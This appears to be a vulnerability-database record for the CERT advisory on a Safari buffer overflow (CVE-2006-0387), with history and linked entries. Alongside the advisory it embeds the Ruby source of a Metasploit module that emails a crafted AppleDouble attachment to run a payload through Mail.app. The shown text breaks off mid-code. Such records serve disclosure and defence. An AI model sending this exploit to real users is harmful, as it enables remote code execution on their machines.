ID VU:176732 Type cert Reporter CERT Modified 2006-03-03T00:00:00
Description
Overview
Apple Safari is vulnerable to a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code on a vulnerable system.
Description
Safari
Apple Safari is a web browser that comes with the Mac OS X operating system.
The Problem
Apple Safari contains a stack-based buffer overflow. This vulnerability can be triggered by persuading a user to access a web page containing specially crafted JavaScript with Safari.
Impact
A remote attacker may be able to execute arbitrary code on a vulnerable system.
For instructions on how to disable JavaScript in Safari, please refer to the Safari section of the Securing Your Web Browser document.
Systems Affected
Vendor| Status| Date Notified| Date Updated
---|---|---|---
Apple Computer, Inc.| | -| 03 Mar 2006
If you are a vendor and your product is affected, let us know.
{"id": "VU:176732", "bulletinFamily": "info", "title": "Apple Safari vulnerable to buffer overflow", "description": "### Overview\n\nApple Safari is vulnerable to a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**Safari **\n\nApple [Safari](<http://www.apple.com/safari/>) is a web browser that comes with the [Mac OS X](<http://www.apple.com/macosx/>) operating system. \n \n**The Problem** \n \nApple Safari contains a stack-based buffer overflow. This vulnerability can be triggered by persuading a user to access a web page containing specially crafted JavaScript with Safari. \n \n--- \n \n### Impact\n\nA remote attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Install an update**\n\nThis issue is corrected in [Apple Security Update 2006-001](<http://docs.info.apple.com/article.html?artnum=303382>). \n \n--- \n \n**Disable JavaScript in Safari**\n\n \nFor instructions on how to disable JavaScript in Safari, please refer to the Safari section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Safari>) document. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nApple Computer, Inc.| | -| 03 Mar 2006 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23176732 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Safari>\n * <http://docs.info.apple.com/article.html?artnum=303382>\n * <http://secunia.com/advisories/19064/>\n\n### Credit\n\nThis issue was reported in Apple Security Update 2006-001 . \n\nThis document was written by Jeff Gennari\n\n### Other Information\n\n * CVE IDs: [CVE-2006-0387](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387>)\n * Date Public: 02 Mar 2006\n * Date First Published: 03 Mar 2006\n * Date Last Updated: 03 Mar 2006\n * Severity Metric: 17.21\n * Document Revision: 10\n\n", "published": "2006-03-03T00:00:00", "modified": "2006-03-03T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.kb.cert.org/vuls/id/176732", "reporter": "CERT", "references": ["http://www.apple.com/safari/", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://docs.info.apple.com/article.html?artnum=303382", "http://docs.info.apple.com/article.html?artnum=303382", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "http://secunia.com/advisories/19064/", "http://www.apple.com/macosx/"], "cvelist": ["CVE-2006-0387", "CVE-2006-0387"], "type": "cert", "lastseen": "2018-08-31T02:36:37", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2006-0387", "CVE-2006-0387"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Overview\n\nApple Safari is vulnerable to a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**Safari **\n\nApple [Safari](<http://www.apple.com/safari/>) is a web browser that comes with the [Mac OS X](<http://www.apple.com/macosx/>) operating system. \n \n**The Problem** \n \nApple Safari contains a stack-based buffer overflow. This vulnerability can be triggered by persuading a user to access a web page containing specially crafted JavaScript with Safari. \n \n--- \n \n### Impact\n\nA remote attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Install an update**\n\nThis issue is corrected in [Apple Security Update 2006-001](<http://docs.info.apple.com/article.html?artnum=303382>). \n \n--- \n \n**Disable JavaScript in Safari**\n\n \nFor instructions on how to disable JavaScript in Safari, please refer to the Safari section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Safari>) document. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nApple Computer, Inc.| | -| 03 Mar 2006 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23176732 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Safari>\n * <http://docs.info.apple.com/article.html?artnum=303382>\n * <http://secunia.com/advisories/19064/>\n\n### Credit\n\nThis issue was reported in Apple Security Update 2006-001 . \n\nThis document was written by Jeff Gennari\n\n### Other Information\n\n * CVE IDs: [CVE-2006-0387](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387>)\n * Date Public: 02 Mar 2006\n * Date First Published: 03 Mar 2006\n * Date Last Updated: 03 Mar 2006\n * Severity Metric: 17.21\n * Document Revision: 10\n\n", "edition": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "73491a77b743facdabdd588ff7386001c469e021060f2ef25824fbd3d0826f4d", "hashmap": [{"hash": "9404b28024161af7763e2e9e519614d0", "key": "modified"}, {"hash": "e3485f9eb296da0ace7ebf457faea2b1", "key": "title"}, {"hash": "9404b28024161af7763e2e9e519614d0", "key": "published"}, {"hash": "b6ba9fa6ea18201bf39ea635ecca9f13", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "3752ecf20ba32e0d315c295694272cd7", "key": "references"}, {"hash": "0479f7e6fd6861c85efc9fdf1c821140", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b11020640d762cae91cc4dbc7a484885", "key": "cvelist"}, {"hash": "baadd87320bf57dd91259476786f8467", "key": "href"}, {"hash": "5d2cfab83ed6e86a4812690790dc7ad5", "key": "reporter"}], "history": [], "href": "https://www.kb.cert.org/vuls/id/176732", "id": "VU:176732", "lastseen": "2018-08-30T20:37:13", "modified": "2006-03-03T00:00:00", "objectVersion": "1.3", "published": "2006-03-03T00:00:00", "references": ["http://www.apple.com/safari/", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://docs.info.apple.com/article.html?artnum=303382", "http://docs.info.apple.com/article.html?artnum=303382", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "http://secunia.com/advisories/19064/", "http://www.apple.com/macosx/"], "reporter": "CERT", "title": "Apple Safari vulnerable to buffer overflow", "type": "cert", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T20:37:13"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2006-0387", "CVE-2006-0387"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "### Overview\n\nApple Safari is vulnerable to a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**Safari **\n\nApple [Safari](<http://www.apple.com/safari/>) is a web browser that comes with the [Mac OS X](<http://www.apple.com/macosx/>) operating system. \n \n**The Problem** \n \nApple Safari contains a stack-based buffer overflow. This vulnerability can be triggered by persuading a user to access a web page containing specially crafted JavaScript with Safari. \n \n--- \n \n### Impact\n\nA remote attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Install an update**\n\nThis issue is corrected in [Apple Security Update 2006-001](<http://docs.info.apple.com/article.html?artnum=303382>). \n \n--- \n \n**Disable JavaScript in Safari**\n\n \nFor instructions on how to disable JavaScript in Safari, please refer to the Safari section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Safari>) document. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nApple Computer, Inc.| | -| 03 Mar 2006 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23176732 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Safari>\n * <http://docs.info.apple.com/article.html?artnum=303382>\n * <http://secunia.com/advisories/19064/>\n\n### Credit\n\nThis issue was reported in Apple Security Update 2006-001 . \n\nThis document was written by Jeff Gennari\n\n### Other Information\n\n * CVE IDs: [CVE-2006-0387](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387>)\n * Date Public: 02 Mar 2006\n * Date First Published: 03 Mar 2006\n * Date Last Updated: 03 Mar 2006\n * Severity Metric: 17.21\n * Document Revision: 10\n\n", "edition": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "059cd244c9270de33018bd62db891b86195b96d117a4e40171bddd04a12cbbb6", "hashmap": [{"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "9404b28024161af7763e2e9e519614d0", "key": "modified"}, {"hash": "e3485f9eb296da0ace7ebf457faea2b1", "key": "title"}, {"hash": "9404b28024161af7763e2e9e519614d0", "key": "published"}, {"hash": "b6ba9fa6ea18201bf39ea635ecca9f13", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "3752ecf20ba32e0d315c295694272cd7", "key": "references"}, {"hash": "0479f7e6fd6861c85efc9fdf1c821140", "key": "description"}, {"hash": "b11020640d762cae91cc4dbc7a484885", "key": "cvelist"}, {"hash": "baadd87320bf57dd91259476786f8467", "key": "href"}, {"hash": "5d2cfab83ed6e86a4812690790dc7ad5", "key": "reporter"}], "history": [], "href": "https://www.kb.cert.org/vuls/id/176732", "id": "VU:176732", "lastseen": "2018-08-02T21:56:01", "modified": "2006-03-03T00:00:00", "objectVersion": "1.3", "published": "2006-03-03T00:00:00", "references": ["http://www.apple.com/safari/", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://docs.info.apple.com/article.html?artnum=303382", "http://docs.info.apple.com/article.html?artnum=303382", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "http://secunia.com/advisories/19064/", "http://www.apple.com/macosx/"], "reporter": "CERT", "title": "Apple Safari vulnerable to buffer overflow", "type": "cert", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-02T21:56:01"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2006-0387", "CVE-2006-0387"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "### Overview\n\nApple Safari is vulnerable to a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**Safari **\n\nApple [Safari](<http://www.apple.com/safari/>) is a web browser that comes with the [Mac OS X](<http://www.apple.com/macosx/>) operating system. \n \n**The Problem** \n \nApple Safari contains a stack-based buffer overflow. This vulnerability can be triggered by persuading a user to access a web page containing specially crafted JavaScript with Safari. \n \n--- \n \n### Impact\n\nA remote attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Install an update**\n\nThis issue is corrected in [Apple Security Update 2006-001](<http://docs.info.apple.com/article.html?artnum=303382>). \n \n--- \n \n**Disable JavaScript in Safari**\n\n \nFor instructions on how to disable JavaScript in Safari, please refer to the Safari section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Safari>) document. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nApple Computer, Inc.| | -| 03 Mar 2006 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23176732 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Safari>\n * <http://docs.info.apple.com/article.html?artnum=303382>\n * <http://secunia.com/advisories/19064/>\n\n### Credit\n\nThis issue was reported in Apple Security Update [2006-001](<http://docs.info.apple.com/article.html?artnum=303382>). \n\nThis document was written by Jeff Gennari\n\n### Other Information\n\n * CVE IDs: [CVE-2006-0387](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387>)\n * Date Public: 02 Mar 2006\n * Date First Published: 03 Mar 2006\n * Date Last Updated: 03 Mar 2006\n * Severity Metric: 17.21\n * Document Revision: 10\n\n", "edition": 1, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "410d52e9d37c3372165c766d5660f28c1f961675bdc95be07a54fc0c1b3a9dd9", "hashmap": [{"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "9404b28024161af7763e2e9e519614d0", "key": "modified"}, {"hash": "e3485f9eb296da0ace7ebf457faea2b1", "key": "title"}, {"hash": "9404b28024161af7763e2e9e519614d0", "key": "published"}, {"hash": "b6ba9fa6ea18201bf39ea635ecca9f13", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "aa84179d9e2d36d53f174e9b06aa9b48", "key": "references"}, {"hash": "7f828f2e93540895febd102fa5e3d26c", "key": "description"}, {"hash": "b11020640d762cae91cc4dbc7a484885", "key": "cvelist"}, {"hash": "baadd87320bf57dd91259476786f8467", "key": "href"}, {"hash": "5d2cfab83ed6e86a4812690790dc7ad5", "key": "reporter"}], "history": [], "href": "https://www.kb.cert.org/vuls/id/176732", "id": "VU:176732", "lastseen": "2016-02-03T09:12:59", "modified": "2006-03-03T00:00:00", "objectVersion": "1.2", "published": "2006-03-03T00:00:00", "references": ["http://www.apple.com/safari/", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://www.us-cert.gov/reading_room/securing_browser/#Safari", "http://docs.info.apple.com/article.html?artnum=303382", "http://docs.info.apple.com/article.html?artnum=303382", "http://docs.info.apple.com/article.html?artnum=303382", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "http://secunia.com/advisories/19064/", "http://www.apple.com/macosx/"], "reporter": "CERT", "title": "Apple Safari vulnerable to buffer overflow", "type": "cert", "viewCount": 0}, "differentElements": ["references", "description"], "edition": 1, "lastseen": "2016-02-03T09:12:59"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "b11020640d762cae91cc4dbc7a484885"}, {"key": "cvss", "hash": "956b0cce3d9454921494ef535bcdf2a4"}, {"key": "description", "hash": "0479f7e6fd6861c85efc9fdf1c821140"}, {"key": "href", "hash": "baadd87320bf57dd91259476786f8467"}, {"key": "modified", "hash": "9404b28024161af7763e2e9e519614d0"}, {"key": "published", "hash": "9404b28024161af7763e2e9e519614d0"}, {"key": "references", "hash": "3752ecf20ba32e0d315c295694272cd7"}, {"key": "reporter", "hash": "5d2cfab83ed6e86a4812690790dc7ad5"}, {"key": "title", "hash": "e3485f9eb296da0ace7ebf457faea2b1"}, {"key": "type", "hash": "b6ba9fa6ea18201bf39ea635ecca9f13"}], "hash": "059cd244c9270de33018bd62db891b86195b96d117a4e40171bddd04a12cbbb6", "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "vulnersScore": 9.3}, "objectVersion": "1.3"}
{"cve": [{"lastseen": "2017-07-20T10:49:04", "references": ["http://lists.apple.com/archives/security-announce/2006/Mar/msg00000.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/25032", "http://www.vupen.com/english/advisories/2006/0791", "http://www.kb.cert.org/vuls/id/176732", "http://www.securityfocus.com/bid/16907", "http://www.us-cert.gov/cas/techalerts/TA06-062A.html", "http://docs.info.apple.com/article.html?artnum=303382", "http://securitytracker.com/id?1015713"], "description": "Stack-based buffer overflow in Safari in Mac OS X 10.4.5 and earlier, and 10.3.9 and earlier, allows remote attackers to execute arbitrary code via unspecified vectors involving a web page with crafted JavaScript, a different vulnerability than CVE-2005-4504.", "edition": 2, "reporter": "NVD", "published": "2006-03-06T15:06:00", "title": "CVE-2006-0387", "type": "cve", "enchantments": {"score": {"modified": "2017-07-20T10:49:04", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-0387"], "scanner": [], "modified": "2017-07-19T21:29:42", "cpe": ["cpe:/o:apple:mac_os_x:10.3.4", "cpe:/o:apple:mac_os_x:10.3", "cpe:/o:apple:mac_os_x:10.3.3", "cpe:/o:apple:mac_os_x_server:10.3.8", "cpe:/o:apple:mac_os_x:10.4.3", "cpe:/o:apple:mac_os_x:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.7", "cpe:/o:apple:mac_os_x_server:10.3.1", "cpe:/o:apple:mac_os_x_server:10.4.5", "cpe:/o:apple:mac_os_x_server:10.4.2", "cpe:/o:apple:mac_os_x:10.3.8", "cpe:/o:apple:mac_os_x:10.4", "cpe:/o:apple:mac_os_x_server:10.3.4", "cpe:/o:apple:mac_os_x_server:10.4.4", "cpe:/o:apple:mac_os_x:10.3.2", "cpe:/o:apple:mac_os_x_server:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.6", "cpe:/o:apple:mac_os_x:10.3.9", "cpe:/o:apple:mac_os_x:10.4.1", "cpe:/o:apple:mac_os_x_server:10.3.2", "cpe:/o:apple:mac_os_x:10.4.2", "cpe:/o:apple:mac_os_x:10.3.1", "cpe:/o:apple:mac_os_x_server:10.3.9", "cpe:/o:apple:mac_os_x_server:10.3", "cpe:/o:apple:mac_os_x_server:10.4.3", "cpe:/o:apple:mac_os_x:10.3.6", "cpe:/o:apple:mac_os_x_server:10.3.5", "cpe:/o:apple:mac_os_x_server:10.3.3", "cpe:/o:apple:mac_os_x_server:10.4", "cpe:/o:apple:mac_os_x:10.3.5", "cpe:/o:apple:mac_os_x:10.4.5", "cpe:/o:apple:mac_os_x:10.4.4"], "id": "CVE-2006-0387", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0387", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:20", "references": [], "edition": 1, "description": "## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch (2006-001) to address this vulnerability.\n## References:\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=303382)\nSecurity Tracker: 1015713\n[Secunia Advisory ID:19064](https://secuniaresearch.flexerasoftware.com/advisories/19064/)\n[Related OSVDB ID: 23639](https://vulners.com/osvdb/OSVDB:23639)\n[Related OSVDB ID: 23646](https://vulners.com/osvdb/OSVDB:23646)\n[Related OSVDB ID: 23636](https://vulners.com/osvdb/OSVDB:23636)\n[Related OSVDB ID: 23640](https://vulners.com/osvdb/OSVDB:23640)\n[Related OSVDB ID: 23641](https://vulners.com/osvdb/OSVDB:23641)\n[Related OSVDB ID: 23642](https://vulners.com/osvdb/OSVDB:23642)\n[Related OSVDB ID: 23643](https://vulners.com/osvdb/OSVDB:23643)\n[Related OSVDB ID: 23648](https://vulners.com/osvdb/OSVDB:23648)\n[Related OSVDB ID: 23649](https://vulners.com/osvdb/OSVDB:23649)\n[Related OSVDB ID: 23638](https://vulners.com/osvdb/OSVDB:23638)\n[Related OSVDB ID: 23644](https://vulners.com/osvdb/OSVDB:23644)\n[Related OSVDB ID: 23645](https://vulners.com/osvdb/OSVDB:23645)\n[Related OSVDB ID: 23647](https://vulners.com/osvdb/OSVDB:23647)\nNews Article: http://www.informationweek.com/news/showArticle.jhtml;?articleID=181500394\n[CVE-2006-0387](https://vulners.com/cve/CVE-2006-0387)\n", "reporter": "OSVDB", "published": "2006-02-28T06:02:40", "title": "Apple Safari JavaScript Processing Unspecified Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-0387"], "modified": "2006-02-28T06:02:40", "href": "https://vulners.com/osvdb/OSVDB:23637", "id": "OSVDB:23637", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2018-08-27T03:36:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5.", "reporter": "Rapid7", "published": "2007-11-26T06:11:10", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/osx/email/mailapp_image_exec.rb", "type": "metasploit", "title": "Mail.app Image Attachment Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2713", "CVE-2005-2714", "CVE-2005-3319", "CVE-2005-3353", "CVE-2005-3391", "CVE-2005-3392", "CVE-2005-3706", "CVE-2005-3712", "CVE-2005-4217", "CVE-2005-4504", "CVE-2006-0383", "CVE-2006-0384", "CVE-2006-0386", "CVE-2006-0387", "CVE-2006-0388", "CVE-2006-0389", "CVE-2006-0391", "CVE-2006-0395", "CVE-2007-6165"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Manual", "id": "MSF:EXPLOIT/OSX/EMAIL/MAILAPP_IMAGE_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mail.app Image Attachment Command Execution',\n 'Description' => %q{\n This module exploits a command execution vulnerability in the\n Mail.app application shipped with Mac OS X 10.5.0. This flaw was\n patched in 10.4 in March of 2007, but reintroduced into the final\n release of 10.5.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['hdm', 'kf'],\n 'References' =>\n [\n ['CVE', '2006-0395'],\n ['CVE', '2007-6165'],\n ['OSVDB', '40875'],\n ['BID', '26510'],\n ['BID', '16907']\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Payload' =>\n {\n 'Space' => 8192,\n 'DisableNops' => true,\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'ConnectionType' => '-bind -find',\n },\n },\n 'Platform' => %w{ unix osx },\n 'Targets' =>\n [\n [ 'Mail.app - Command Payloads',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'PayloadCompat' => {\n 'RequiredCmd' => 'generic perl ruby bash-tcp telnet',\n }\n }\n ],\n [ 'Mail.app - Binary Payloads (x86)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mail.app - Binary Payloads (ppc)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n }\n ],\n ],\n 'DisclosureDate' => 'Mar 01 2006'\n ))\n\n end\n\n def autofilter\n false\n end\n\n def exploit\n\n exts = ['jpg']\n\n gext = exts[rand(exts.length)]\n name = rand_text_alpha(5) + \".#{gext}\"\n data = rand_text_alpha(rand(32)+1)\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n dbl = Rex::MIME::Message.new\n dbl.header.set(\"Content-Type\", \"multipart/appledouble;\\r\\n boundary=#{dbl.bound}\")\n dbl.header.set(\"Content-Disposition\", \"inline\")\n\n # AppleDouble file version 2\n # 3 entries - 'Finder Info', 'Real name', 'Resource Fork'\n # Real Name matches msf random generated 5 character name - (I cheated ala gsub)\n\n resfork =\n \"AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\\r\\n\" +\n \"UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\\r\\n\" +\n \"AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\\r\\n\" +\n \"7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\\r\\n\" +\n \"5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\\r\\n\" +\n \"/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\\r\\n\" +\n \"8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\\r\\n\" +\n \"9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\\r\\n\" +\n \"/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\\r\\n\" +\n \"/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\\r\\n\" +\n \"AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\r\\n\" +\n \"AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8\" + \"\\r\\n\"\n\n fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub(\"Heise.jpg\",name), \"\\r\\n\" )\n\n cid = \"<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>\"\n\n cmd = ''\n\n if (target.arch.include?(ARCH_CMD))\n cmd = Rex::Text.encode_base64(payload.encoded, \"\\r\\n\")\n else\n bin = generate_payload_exe\n cmd = Rex::Text.encode_base64(bin, \"\\r\\n\")\n end\n\n\n dbl.add_part(fork , \"application/applefile;\\r\\n name=\\\"#{name}\\\"\", \"base64\", \"inline;\\r\\n filename=#{name}\" )\n dbl.add_part(cmd , 